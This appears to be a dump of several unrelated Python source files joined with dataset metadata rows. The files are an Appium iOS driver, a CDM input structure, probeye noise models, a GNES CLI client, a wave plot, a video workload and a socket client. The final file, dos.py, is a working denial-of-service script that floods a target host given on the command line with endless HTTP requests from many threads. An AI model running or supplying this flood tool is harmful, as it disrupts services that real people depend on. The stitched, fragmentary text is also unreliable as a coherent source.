"platformName": "iOS",
"automationName": "XCUITest",
"platformVersion": "11.0",
"app": "/Users/hunter/Desktop/python/PythonAppium2/app/iOSFinancial.app",
"deviceName": "iPhone 8",
"noReset":"true"
}
capabilities_real = {
"udid": "5d00e43272746fd85c456ddcbe52593b64d7f132",
"app": "/Users/hunter/Desktop/iOSFinancial-r.app",
"platformName": "iOS",
"deviceName": "iPhone",
"automationName": "XCUITest",
"platformVersion": "11.4"
}
class Driver():
def start_driver(self, port):
server = server_base + str(port) + server_end
try:
print(server, capabilities_real)
driver = webdriver.Remote(server, capabilities_real)
return driver
except Exception as e:
print('driver start error:', e)
return None
if __name__ == '__main__':
driver = Driver()
driver.start_driver(4723)
| 22.851064 | 77 | 0.620112 | 111 | 1,074 | 5.846847 | 0.576577 | 0.07396 | 0.114022 | 0.120185 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056901 | 0.230912 | 1,074 | 46 | 78 | 23.347826 | 0.728814 | 0.040037 | 0 | 0.125 | 0 | 0 | 0.351509 | 0.139241 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.03125 | 0 | 0.15625 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2cb10f64b9ef71fc7c131f5445359c3201c9700 | 1,497 | py | Python | objectModel/Python/cdm/resolvedmodel/expression_parser/input_values.py | rt112000/CDM | 34bd34f9260140a8f8aa02bd87c23033f3daad4c | [
"CC-BY-4.0",
"MIT"
] | 884 | 2019-05-10T02:09:10.000Z | 2022-03-31T14:02:00.000Z | objectModel/Python/cdm/resolvedmodel/expression_parser/input_values.py | spbast/CDM | bf97a3720c97ee4c9df3625084cf8b3bc65ff9c7 | [
"CC-BY-4.0",
"MIT"
] | 171 | 2019-06-10T11:34:37.000Z | 2022-03-31T22:50:12.000Z | objectModel/Python/cdm/resolvedmodel/expression_parser/input_values.py | spbast/CDM | bf97a3720c97ee4c9df3625084cf8b3bc65ff9c7 | [
"CC-BY-4.0",
"MIT"
] | 340 | 2019-05-07T18:00:16.000Z | 2022-03-31T12:00:15.000Z | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
from typing import Optional, TYPE_CHECKING
if TYPE_CHECKING:
from cdm.resolvedmodel.projections.projection_directive import ProjectionDirective
class InputValues:
"""A structure to carry all the input values during evaluation/resolution of an expression tree"""
def __init__(self, proj_directive: 'ProjectionDirective'):
if not proj_directive:
return
self.no_max_depth = proj_directive._has_no_maximum_depth # type: Optional[bool]
self.is_array = proj_directive._is_array # type: Optional[bool]
self.reference_only = proj_directive._is_reference_only # type: Optional[bool]
self.normalized = proj_directive._is_normalized # type: Optional[bool]
self.structured = proj_directive._is_structured # type: Optional[bool]
self.is_virtual = proj_directive._is_virtual # type: Optional[bool]
self.next_depth = proj_directive._res_opt._depth_info.current_depth # type: Optional[int]
self.max_depth = proj_directive._maximum_depth # type: Optional[int]
self.min_cardinality = proj_directive._cardinality._minimum_number if proj_directive._cardinality else None # type: Optional[int]
self.max_cardinality = proj_directive._cardinality._maximum_number if proj_directive._cardinality else None # type: Optional[int]
| 49.9 | 138 | 0.752171 | 187 | 1,497 | 5.700535 | 0.417112 | 0.170732 | 0.090056 | 0.11257 | 0.198874 | 0.103189 | 0.103189 | 0.103189 | 0.103189 | 0.103189 | 0 | 0 | 0.177021 | 1,497 | 29 | 139 | 51.62069 | 0.86526 | 0.300601 | 0 | 0 | 0 | 0 | 0.018447 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.117647 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2d00c6db9f20e63c501bb2ab3b7059442e579b6 | 11,511 | py | Python | probeye/definition/noise_model.py | BAMresearch/probeye | ff018ef629f7d5ce4a263b6656b363f90ab6be02 | [
"MIT"
] | null | null | null | probeye/definition/noise_model.py | BAMresearch/probeye | ff018ef629f7d5ce4a263b6656b363f90ab6be02 | [
"MIT"
] | 42 | 2021-08-24T06:50:17.000Z | 2022-03-25T09:05:41.000Z | probeye/definition/noise_model.py | BAMresearch/probeye | ff018ef629f7d5ce4a263b6656b363f90ab6be02 | [
"MIT"
] | 2 | 2021-11-14T22:30:54.000Z | 2022-02-28T13:39:00.000Z | # standard library
from typing import Union, List, Optional
# third party imports
import numpy as np
# local imports
from probeye.definition.sensor import Sensor
from probeye.subroutines import make_list, translate_prms_def
class NoiseModelBase:
def __init__(
self,
dist: str,
prms_def: Union[str, List[Union[str, dict]], dict],
sensors: Union[Sensor, List[Sensor]],
name: Optional[str] = None,
corr: Optional[str] = None,
corr_model: Optional[str] = None,
noise_type: str = "additive",
):
"""
Parameters
----------
dist
A string specifying the probability distribution the noise model is based
on, e.g. 'normal'.
prms_def
A list of parameter names (strings) defining how a noise parameter vector
given to the loglike_contribution method is interpreted. For example:
prms_def = ['mu', 'sigma'] means that the noise parameter vector has two
elements, the first of which gives the value of 'mu' and the second gives
the value of 'sigma'.
sensors
Sensor objects that are required to evaluate the noise model.
name
Unique name of the noise model. This name is None, if the user does not
specify it when adding the noise model to the problem. It is then named
automatically before starting the inference engine.
corr
Defines the correlation model. So far this is just a placeholder. It is not
clear yet how exactly the correlation should be defined. When it is set to
None, all sensors/sensor elements are independent.
corr_model
Defines the correlation function to be used in case corr isn't None.
noise_type
Either 'additive', 'multiplicative' or 'other'. Defines if the error is
computed via [prediction - measurement] ('additive') or via [prediction/
measurement-1] ('multiplicative') or in some 'other' i.e.,
non-standard fashion.
"""
self.dist = dist
self.prms_def, self.prms_dim = translate_prms_def(prms_def)
self.sensors = make_list(sensors)
self.sensor_names = [sensor.name for sensor in self.sensors]
self.name = name
self.corr = corr
self.corr_model = corr_model
self.noise_type = noise_type
# this is a list of experiment names, that relate to the noise model; the list
# will be filled after experiments have been added to the InferenceProblem and
# the problem definition is complete; in this case call InferenceProblem.
# assign_experiments_to_noise_models() to fill it with the corresponding names
self.experiment_names = [] # type: List[str]
# as soon as defined, this attribute will be a pointer to the inference
# problems experiments (it will be used for consistency checks)
self.problem_experiments = {} # type: dict
# set the error_function depending on the noise-type
if noise_type == "additive":
self.error_function = self.error_function_additive
elif noise_type == "multiplicative":
self.error_function = self.error_function_multiplicative
elif noise_type == "other":
self.error_function = self.error_function_other
else:
raise ValueError(
f"Encountered unknown noise_type: '{noise_type}'. The noise_type must "
f"be either 'additive', 'multiplicative' or 'other'."
)
def add_experiments(self, experiment_names_: Union[str, List[str]]):
"""
Adds experiment names to the noise model. When the noise model is evaluated it
will only be evaluated for those experiments added here.
Parameters
----------
experiment_names_
Names (strings) of experiments from the InferenceProblem that should be
added to the noise model.
"""
# check if the given experiments are compatible with the noise model with
# respect to the sensors
experiment_names = make_list(experiment_names_)
forward_models = set()
for exp_name in experiment_names:
exp_dict = self.problem_experiments[exp_name]
forward_models.add(exp_dict["forward_model"])
sensor_names_exp = [*exp_dict["sensor_values"].keys()]
for sensor_name in self.sensor_names:
if sensor_name not in sensor_names_exp:
raise RuntimeError(
f"Experiment '{exp_name}' does not contain a sensor "
f"'{sensor_name}' which is required for the evaluation of the "
f"noise model."
)
# check if the given experiments all refer to one forward model
if len(forward_models) > 1:
raise RuntimeError(
f"The given experiments refer to more than one forward model!"
)
# check if one of the given experiments have been added before
for exp_name in experiment_names:
if exp_name in self.experiment_names:
raise RuntimeError(
f"The experiment '{exp_name}' has already been added to this noise "
f"model. Something might be wrong here."
)
self.experiment_names += experiment_names
def error(self, model_response_dict: dict) -> dict:
"""
Computes the model error for all of the noise model's experiments and returns
them in a dictionary that is sorted by output sensor_values.
Parameters
----------
model_response_dict
The first key is the name of the experiment. The values are dicts which
contain the forward model's output sensor's names as keys have the
corresponding model responses as values.
Returns
-------
model_error
A dictionary with the keys being the noise model's sensor names, and 1D
numpy arrays representing the model errors as values.
"""
# prepare the dictionary keys
model_error_dict = {name: np.array([]) for name in self.sensor_names}
# fill the dictionary with model error vectors
for exp_name in self.experiment_names:
exp_dict = self.problem_experiments[exp_name]
ym_dict = model_response_dict[exp_name]
ye_dict = exp_dict["sensor_values"]
me_dict = self.error_function(ym_dict, ye_dict)
model_error_dict = {
name: np.append(model_error_dict[name], me_dict[name])
for name in self.sensor_names
}
return model_error_dict
def error_function_additive(self, ym_dict: dict, ye_dict: dict) -> dict:
"""
Evaluates the additive model error for each of the noise model' sensors.
Parameters
----------
ym_dict
The computed values for the model's output sensor_values.
ye_dict
The measured values for the model's output sensor_values.
Returns
-------
error_dict
The computed model error for the model's output sensor_values.
"""
# for each sensor, its own error metric is used to compute the error
error_dict = {name: ym_dict[name] - ye_dict[name] for name in self.sensor_names}
return error_dict
def error_function_multiplicative(self, ym_dict: dict, ye_dict: dict) -> dict:
"""
Evaluates the multiplicative model error for each of the noise model's sensors.
Parameters
----------
ym_dict
The computed values for the model's output sensor_values.
ye_dict
The measured values for the model's output sensor_values.
Returns
-------
error_dict
The computed model error for the model's output sensor_values.
"""
# for each sensor, its own error metric is used to compute the error
error_dict = {
name: ym_dict[name] / ye_dict[name] - 1.0 for name in self.sensor_names
}
return error_dict
def error_function_other(self, ym_dict: dict, ye_dict: dict) -> dict:
"""
Non-standard error function self.error_function will point to when self.
noise_type is set to 'other'. See self.error_function for more information.
"""
raise NotImplementedError(
"Your model does not have an non-standard error_function-method yet. If "
"you want to use it, you need to implement it first."
)
def loglike_contribution(
self, model_response_dict: dict, prms: dict, worst_value: float = -np.infty
) -> float:
"""
Evaluates the log-likelihood function for the given model error and the given
noise parameter vector. This method has to be overwritten.
Parameters
----------
model_response_dict
The first key is the name of the experiment. The values are dicts which
contain the forward model's output sensor's names as keys have the
corresponding model responses as values.
prms
Dictionary containing parameter name:value pairs.
worst_value
This value is returned when this method does not result in a numeric value.
This might happen for example when the given parameters are not valid (for
example in case of a negative standard deviation). The returned value in
such cases should represent the worst possible value of the contribution.
Returns
-------
ll
The evaluated log-likelihood function.
"""
raise NotImplementedError(
"Your model does not have a loglike_contribution-method. You need to "
"define this method so you can evaluate your noise model."
)
class NormalNoiseModel(NoiseModelBase):
"""
A general Gaussian (normal) noise model with or without correlations.
"""
def __init__(
self,
prms_def: Union[str, List[Union[str, dict]], dict],
sensors: Union[Sensor, List[Sensor]],
name: Optional[str] = None,
corr: Optional[str] = None,
corr_model: Optional[str] = None,
noise_type: str = "additive",
):
"""
See docstring of NoiseModelBase for information on the input arguments.
"""
# initialize the base class with given input
super().__init__(
"normal",
prms_def,
sensors,
name=name,
corr=corr,
corr_model=corr_model,
noise_type=noise_type,
)
# check that at the standard deviation is provided (this can be either as a
# constant or a latent parameter, but it has to be given)
if "std" not in [*self.prms_def.values()]:
raise RuntimeError(
"The standard deviation 'std' was not provided in prms_def!"
)
# the mean value(s) do not have to be stated explicitly; if they are not given,
# the are assumed to be zero
self.zero_mean = True
if "mean" in [*self.prms_def.values()]:
self.zero_mean = False
| 40.819149 | 88 | 0.616541 | 1,442 | 11,511 | 4.793343 | 0.199029 | 0.018519 | 0.02445 | 0.020833 | 0.32798 | 0.28588 | 0.256076 | 0.232928 | 0.219618 | 0.199363 | 0 | 0.000637 | 0.317696 | 11,511 | 281 | 89 | 40.964413 | 0.879425 | 0.450004 | 0 | 0.252101 | 0 | 0 | 0.147194 | 0.009016 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067227 | false | 0 | 0.033613 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2d04c5ee8c36428fe2986aecb0322ff15966a1b | 5,050 | py | Python | gnes/client/cli.py | dixiak/gnes | 12513d29157a06bd22923717fd0c19a856f20193 | [
"Apache-2.0"
] | null | null | null | gnes/client/cli.py | dixiak/gnes | 12513d29157a06bd22923717fd0c19a856f20193 | [
"Apache-2.0"
] | null | null | null | gnes/client/cli.py | dixiak/gnes | 12513d29157a06bd22923717fd0c19a856f20193 | [
"Apache-2.0"
] | null | null | null | # Tencent is pleased to support the open source community by making GNES available.
#
# Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import time
import zipfile
from math import ceil
from typing import List
from termcolor import colored
from .base import GrpcClient
from ..proto import RequestGenerator, gnes_pb2
class CLIClient(GrpcClient):
def __init__(self, args):
super().__init__(args)
getattr(self, self.args.mode)(self.read_all())
self.close()
def train(self, all_bytes: List[bytes]):
with ProgressBar(all_bytes, self.args.batch_size, task_name=self.args.mode) as p_bar:
for _ in self._stub.StreamCall(RequestGenerator.train(all_bytes,
doc_id_start=self.args.start_doc_id,
batch_size=self.args.batch_size)):
p_bar.update()
def index(self, all_bytes: List[bytes]):
with ProgressBar(all_bytes, self.args.batch_size, task_name=self.args.mode) as p_bar:
for _ in self._stub.StreamCall(RequestGenerator.index(all_bytes,
doc_id_start=self.args.start_doc_id,
batch_size=self.args.batch_size)):
p_bar.update()
def query(self, all_bytes: List[bytes]):
for idx, q in enumerate(all_bytes):
for req in RequestGenerator.query(q, request_id_start=idx, top_k=self.args.top_k):
resp = self._stub.Call(req)
self.query_callback(req, resp)
def query_callback(self, req: 'gnes_pb2.Request', resp: 'gnes_pb2.Response'):
"""
callback after get the query result
override this method to customize query behavior
:param resp: response
:param req: query
:return:
"""
print(req)
print(resp)
def read_all(self) -> List[bytes]:
if self.args.txt_file:
all_bytes = [v.encode() for v in self.args.txt_file]
elif self.args.image_zip_file:
zipfile_ = zipfile.ZipFile(self.args.image_zip_file)
all_bytes = [zipfile_.open(v).read() for v in zipfile_.namelist()]
elif self.args.video_zip_file:
zipfile_ = zipfile.ZipFile(self.args.video_zip_file)
all_bytes = [zipfile_.open(v).read() for v in zipfile_.namelist()]
else:
raise AttributeError('--txt_file, --image_zip_file, --video_zip_file one must be given')
return all_bytes
class ProgressBar:
def __init__(self, all_bytes: List[bytes], batch_size: int, bar_len: int = 20, task_name: str = ''):
self.all_bytes_len = [len(v) for v in all_bytes]
self.batch_size = batch_size
self.total_batch = ceil(len(self.all_bytes_len) / self.batch_size)
self.bar_len = bar_len
self.task_name = task_name
def update(self):
if self.num_batch > self.total_batch - 1:
return
sys.stdout.write('\r')
elapsed = time.perf_counter() - self.start_time
elapsed_str = colored('elapsed', 'yellow')
speed_str = colored('speed', 'yellow')
estleft_str = colored('left', 'yellow')
self.num_batch += 1
percent = self.num_batch / self.total_batch
num_bytes = sum(self.all_bytes_len[((self.num_batch - 1) * self.batch_size):(self.num_batch * self.batch_size)])
sys.stdout.write(
'{:>10} [{:<{}}] {:3.0f}% {:>8}: {:3.1f}s {:>8}: {:3.1f} bytes/s {:3.1f} batch/s {:>8}: {:3.1f}s'.format(
colored(self.task_name, 'cyan'),
colored('=' * int(self.bar_len * percent), 'green'),
self.bar_len + 9,
percent * 100,
elapsed_str,
elapsed,
speed_str,
num_bytes / elapsed,
self.num_batch / elapsed,
estleft_str,
(self.total_batch - self.num_batch) / ((self.num_batch + 0.0001) / elapsed)
))
sys.stdout.flush()
def __enter__(self):
self.start_time = time.perf_counter()
self.num_batch = -1
sys.stdout.write('\n')
self.update()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
sys.stdout.write('\t%s\n' % colored('done!', 'green'))
| 40.4 | 122 | 0.596634 | 659 | 5,050 | 4.359636 | 0.30349 | 0.047337 | 0.037591 | 0.022276 | 0.259659 | 0.219283 | 0.201183 | 0.176123 | 0.176123 | 0.176123 | 0 | 0.012085 | 0.295446 | 5,050 | 124 | 123 | 40.725806 | 0.795391 | 0.162574 | 0 | 0.116279 | 0 | 0.011628 | 0.06274 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116279 | false | 0 | 0.093023 | 0 | 0.267442 | 0.023256 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2d095cca36d579b4c4aba638f516534e9e13094 | 1,224 | py | Python | wave path difference/3d.py | muronglengjing/sound-wave | b6d75f11f015bc422460be1df79a36234a64afb1 | [
"MIT"
] | 3 | 2020-11-09T15:45:19.000Z | 2021-01-02T04:15:49.000Z | wave path difference/3d.py | muronglengjing/sound-wave | b6d75f11f015bc422460be1df79a36234a64afb1 | [
"MIT"
] | null | null | null | wave path difference/3d.py | muronglengjing/sound-wave | b6d75f11f015bc422460be1df79a36234a64afb1 | [
"MIT"
] | 1 | 2020-11-09T15:49:54.000Z | 2020-11-09T15:49:54.000Z | import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider
import matplotlib.animation as animation
# to get the distance of wave
# y = kx + b
# ax+by+cz+d = 0
class F:
def __init__(self, a, b, c, d):
self.a = a
self.b = b
self.c = c
self.d = d
def distance(self, x, y, z):
return np.abs((self.a*x + self.b*y+self.c*z+self.d)/(np.sqrt(self.a**2+self.b**2+self.c**2)))
# become real axic
def axic(x, y, z):
_x = x * _w / _N
_y = y * _l / _M
_z = z * _h / _O
return _x, _y, _z
# var
L = 9
# const var
_pi = 3.1415926
# wave
_u = 343
_v = 40000
_lambda = _u / _v
_w = 2*_pi*_v
# degree
_N, _M, _O = 20, 20, 20
# create zero array
array = np.zeros((_N, _M, _O))
# length
_l = L * _lambda / 2
_w = L * _lambda / 2
_h = L * _lambda / 2
f1 = F(0, 0, 1, 0)
f2 = F(0, 0, 1, -_h)
for i in range(0, _N):
for j in range(0, _M):
for k in range(0, _O):
_x, _y, _z = axic(i, j, k)
array[i][j][k] = _pi * (f1.distance(_x, _y, _z)+_lambda/2-f2.distance(_x, _y, _z)) / _lambda
array = np.cos(array)
array = np.abs(array)
contour = plt.contourf(array[0, :, :])
plt.colorbar(contour)
plt.show()
| 17.485714 | 104 | 0.558007 | 231 | 1,224 | 2.727273 | 0.341991 | 0.019048 | 0.028571 | 0.012698 | 0.053968 | 0 | 0 | 0 | 0 | 0 | 0 | 0.053167 | 0.277778 | 1,224 | 69 | 105 | 17.73913 | 0.659502 | 0.098856 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075 | false | 0 | 0.1 | 0.025 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2d1c535f397cdd8f4ccfa83d542ceadcab2a601 | 6,007 | py | Python | wlauto/workloads/video/__init__.py | joesavage/workload-automation | 3a863fa14369d9bf1f20f82eb5ab4582499c6b99 | [
"Apache-2.0"
] | 5 | 2016-04-27T13:51:12.000Z | 2016-06-23T12:38:14.000Z | wlauto/workloads/video/__init__.py | joesavage/workload-automation | 3a863fa14369d9bf1f20f82eb5ab4582499c6b99 | [
"Apache-2.0"
] | 110 | 2016-05-05T19:13:26.000Z | 2017-01-20T16:18:02.000Z | wlauto/workloads/video/__init__.py | joesavage/workload-automation | 3a863fa14369d9bf1f20f82eb5ab4582499c6b99 | [
"Apache-2.0"
] | 1 | 2016-04-27T15:18:55.000Z | 2016-04-27T15:18:55.000Z | # Copyright 2013-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pylint: disable=E1101,E0203,W0201
import os
import urllib
from collections import defaultdict
from wlauto import Workload, settings, Parameter, Alias
from wlauto.exceptions import ConfigError, WorkloadError
from wlauto.utils.misc import ensure_directory_exists as _d
from wlauto.utils.types import boolean
DOWNLOAD_URLS = {
'1080p': 'http://download.blender.org/peach/bigbuckbunny_movies/big_buck_bunny_1080p_surround.avi',
'720p': 'http://download.blender.org/peach/bigbuckbunny_movies/big_buck_bunny_720p_surround.avi',
'480p': 'http://download.blender.org/peach/bigbuckbunny_movies/big_buck_bunny_480p_surround-fix.avi'
}
class VideoWorkload(Workload):
name = 'video'
description = """
Plays a video file using the standard android video player for a predetermined duration.
The video can be specified either using ``resolution`` workload parameter, in which case
`Big Buck Bunny`_ MP4 video of that resolution will be downloaded and used, or using
``filename`` parameter, in which case the video file specified will be used.
.. _Big Buck Bunny: http://www.bigbuckbunny.org/
"""
supported_platforms = ['android']
parameters = [
Parameter('play_duration', kind=int, default=20,
description='Playback duration of the video file. This become the duration of the workload.'),
Parameter('resolution', default='720p', allowed_values=['480p', '720p', '1080p'],
description='Specifies which resolution video file to play.'),
Parameter('filename',
description="""
The name of the video file to play. This can be either a path
to the file anywhere on your file system, or it could be just a
name, in which case, the workload will look for it in
``~/.workloads_automation/dependency/video``
*Note*: either resolution or filename should be specified, but not both!
"""),
Parameter('force_dependency_push', kind=boolean, default=False,
description="""
If true, video will always be pushed to device, regardless
of whether the file is already on the device. Default is ``False``.
"""),
]
aliases = [
Alias('video_720p', resolution='720p'),
Alias('video_1080p', resolution='1080p'),
]
@property
def host_video_file(self):
if not self._selected_file:
if self.filename:
if self.filename[0] in './' or len(self.filename) > 1 and self.filename[1] == ':':
filepath = os.path.abspath(self.filename)
else:
filepath = os.path.join(self.video_directory, self.filename)
if not os.path.isfile(filepath):
raise WorkloadError('{} does not exist.'.format(filepath))
self._selected_file = filepath
else:
files = self.video_files[self.resolution]
if not files:
url = DOWNLOAD_URLS[self.resolution]
filepath = os.path.join(self.video_directory, os.path.basename(url))
self.logger.debug('Downloading {}...'.format(filepath))
urllib.urlretrieve(url, filepath)
self._selected_file = filepath
else:
self._selected_file = files[0]
if len(files) > 1:
self.logger.warn('Multiple files for 720p found. Using {}.'.format(self._selected_file))
self.logger.warn('Use \'filename\'parameter instead of \'resolution\' to specify a different file.')
return self._selected_file
def init_resources(self, context):
self.video_directory = _d(os.path.join(settings.dependencies_directory, 'video'))
self.video_files = defaultdict(list)
self.enum_video_files()
self._selected_file = None
def setup(self, context):
on_device_video_file = os.path.join(self.device.working_directory, os.path.basename(self.host_video_file))
if self.force_dependency_push or not self.device.file_exists(on_device_video_file):
self.logger.debug('Copying {} to device.'.format(self.host_video_file))
self.device.push_file(self.host_video_file, on_device_video_file, timeout=120)
self.device.clear_logcat()
command = 'am start -W -S -n com.android.gallery3d/.app.MovieActivity -d {}'.format(on_device_video_file)
self.device.execute(command)
def run(self, context):
self.device.sleep(self.play_duration)
def update_result(self, context):
self.device.execute('am force-stop com.android.gallery3d')
def teardown(self, context):
pass
def validate(self):
if (self.resolution and self.filename) and (self.resolution != self.parameters['resolution'].default):
raise ConfigError('Ether resolution *or* filename must be specified; but not both.')
def enum_video_files(self):
for filename in os.listdir(self.video_directory):
for resolution in self.parameters['resolution'].allowed_values:
if resolution in filename:
self.video_files[resolution].append(os.path.join(self.video_directory, filename))
| 45.165414 | 124 | 0.649575 | 738 | 6,007 | 5.168022 | 0.319783 | 0.030676 | 0.029366 | 0.014683 | 0.111956 | 0.089932 | 0.063713 | 0.044835 | 0.044835 | 0.044835 | 0 | 0.019411 | 0.25387 | 6,007 | 132 | 125 | 45.507576 | 0.831548 | 0.097719 | 0 | 0.103093 | 0 | 0 | 0.345492 | 0.023329 | 0 | 0 | 0 | 0 | 0 | 1 | 0.082474 | false | 0.010309 | 0.072165 | 0 | 0.226804 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2d2b4052b90ff8fb0044cd2881dbc85ff0ecd49 | 337 | py | Python | pyGAE/app_config.py | analyticstraining/pycocms | 29d7c3eea9377495bcafd8b8c62016c21c1a74a7 | [
"MIT"
] | null | null | null | pyGAE/app_config.py | analyticstraining/pycocms | 29d7c3eea9377495bcafd8b8c62016c21c1a74a7 | [
"MIT"
] | null | null | null | pyGAE/app_config.py | analyticstraining/pycocms | 29d7c3eea9377495bcafd8b8c62016c21c1a74a7 | [
"MIT"
] | null | null | null | '''
Configuration script in Python.
Add a secret_key
'''
APP_CONFIG = {
'webapp2_extras.auth': {
'user_model': 'models.User',
'user_attributes': ['name', "email_address"]
},
'webapp2_extras.sessions': {
'secret_key': 'YOUR_SECRET_KEY'
}
}
APP_NAME = "pycoCMS"
MAIL_SENDER = 'pycoCMS@pycoCMS.org' | 19.823529 | 52 | 0.626113 | 38 | 337 | 5.236842 | 0.684211 | 0.135678 | 0.120603 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007576 | 0.216617 | 337 | 17 | 53 | 19.823529 | 0.746212 | 0.142433 | 0 | 0 | 0 | 0 | 0.517731 | 0.08156 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2d40cbadb8b28d4ec71d0513975ed33675020aa | 627 | py | Python | Cloud/2/ATMClientCLI.py | hsinewu/School | 2c55a3fd4a7794e64651b66d36f439a11c180b2c | [
"MIT"
] | null | null | null | Cloud/2/ATMClientCLI.py | hsinewu/School | 2c55a3fd4a7794e64651b66d36f439a11c180b2c | [
"MIT"
] | null | null | null | Cloud/2/ATMClientCLI.py | hsinewu/School | 2c55a3fd4a7794e64651b66d36f439a11c180b2c | [
"MIT"
] | null | null | null | # Echo client program
import socket, select, sys, threading
from Tkinter import *
HOST = 'localhost' # The remote host
PORT = 54321 # The same port as used by the server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
def sending():
while 1:
sock.sendall(raw_input())
def receiving():
while 1:
data = sock.recv(1024)
if data=='exit':
sock.close()
sys.exit()
sys.stdout.write(data)
r = threading.Thread(target=receiving)
s = threading.Thread(target=sending)
r.start()
s.start()
r.join()
s.join()
# sock.close()
| 20.9 | 59 | 0.633174 | 86 | 627 | 4.581395 | 0.55814 | 0.040609 | 0.106599 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022965 | 0.236045 | 627 | 29 | 60 | 21.62069 | 0.799582 | 0.133971 | 0 | 0.090909 | 0 | 0 | 0.024164 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2d4c6363a58b677b5bab043fe856e68f531b918 | 782 | py | Python | python/dos.py | PrestonMonteWest/bin | d7ed1eea9d60d58a6f8af5bdc22da646c585407d | [
"Unlicense"
] | null | null | null | python/dos.py | PrestonMonteWest/bin | d7ed1eea9d60d58a6f8af5bdc22da646c585407d | [
"Unlicense"
] | null | null | null | python/dos.py | PrestonMonteWest/bin | d7ed1eea9d60d58a6f8af5bdc22da646c585407d | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
from socket import socket, AF_INET, SOCK_STREAM
from threading import Thread
from multiprocessing import cpu_count
import sys
def attack(host, port, num):
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
while True:
print('Thread {} : Sending request to {}:{}...'.format(num, host, port))
s.send(
(
'GET / HTTP/1.1\r\n'
'Host: {}\r\n'.format(host) +
'\r\n'
).encode('utf-8')
)
if __name__ == '__main__':
host = sys.argv[1]
try:
port = int(sys.argv[2])
except (IndexError, ValueError):
port = 80
for i in range(cpu_count() * 2):
t = Thread(target=attack, args=(host, port, i + 1))
t.start()
